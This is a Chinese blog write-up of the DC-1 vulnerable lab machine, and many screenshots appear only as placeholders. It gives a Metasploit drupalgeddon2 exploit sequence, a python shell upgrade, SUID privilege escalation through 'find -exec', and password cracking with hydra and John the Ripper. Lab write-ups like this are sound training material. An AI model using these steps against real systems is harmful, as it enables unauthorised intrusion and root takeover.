星星博客 »  > 

DC靶机系列----1

  • 一、使用kali中nmap进行ip扫描:
    在这里插入图片描述

在这里插入图片描述

  • 二、
  • 在这里插入图片描述
  • 三、进行robots文件的查看:
  • 在这里插入图片描述
  • 四 、进行敏感文件的查看,发现:
    在这里插入图片描述
  • 五、漏洞利用:
    寻找Drupal 7.0版本并且进行漏洞利用;
msfconsole
search  drupal
use exploit/unix/webapp/drupal_drupalgeddon2
show options
set rhost 192.168.1.119
run

反弹shell:
在这里插入图片描述
使用pyhton进行交互式反弹shell:

python -c “import pty;pty.spawn('/bin/bash')

在这里插入图片描述
在目录下发现flag1.txt:
在这里插入图片描述
Drupal的默认配置文件为/var/www/sites/default/settings.php并查看:
在这里插入图片描述
得到了flag2和数据库用户名与密码,从数据库下手:
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
这里的密码是经过加密的,这里参考官方的置换加密算法;

站点路径下执行:php scripts/password-hash.sh 新密码

在这里插入图片描述
进行管理员密码的修改:
在这里插入图片描述

  • 登录网站,所搜发现flag3
    在这里插入图片描述
    在这里插入图片描述
  • 权限提升:
    在flag3中提示用-exec,所以可能是SUID来提权,在此使用find命令查找suid权限的可执行二进制程序
find / -perm -4000 2>/dev/null

在这里插入图片描述
对find命令进行测试并获取root权限

touch 666
find / -name 666 -exec "whoami" \;

在这里插入图片描述
查看敏感文件/etc/passwd 发现flag4:
在这里插入图片描述
然后进行flag4的密码爆破,此时用的方法是hydra+ john the ripper 进行爆破:

wget http://www.openwall.com/john/j/john-1.8.0.tar.gz   #下载John密码包
tar -xvf john-1.8.0.tar.gz  #解压缩
cd john-1.8.0/ src    #进入源码目录下
uname -a  #查看当前系统版本
make linux-x86-64   #编译并指定当前的Linux系统版本

在这里插入图片描述
在这里插入图片描述
注意:
·一定要注意上面的—P要大写,还有后面的路径/home/kali/john-1.8.0不要照搬,要用自己解压后john-1.8.0文件夹实际所在的位置,我起初就是照搬的路径,结果扫不出密码
flag4(这里插一句,flag4是靶机上的普通用户,我亲手试了用其可以登录靶机,而不是网站用户)

链接flag4:
在这里插入图片描述
此时,是$ 而不是#,所以进行提权;
在这里插入图片描述

到此为止,全部flag已进找到。通过此次的实战,对nmap的使用,hydra的使用,sql语句的使用,提权的方式有了更深的认识,但是在提权方面还需要进一步加强!

参考文章1:https://blog.csdn.net/prettyX/article/details/103267130
参考文章2:https://laosec.cn/2021/05/10/%e9%9d%b6%e6%9c%ba%e7%b3%bb%e5%88%97-dc_1/

相关文章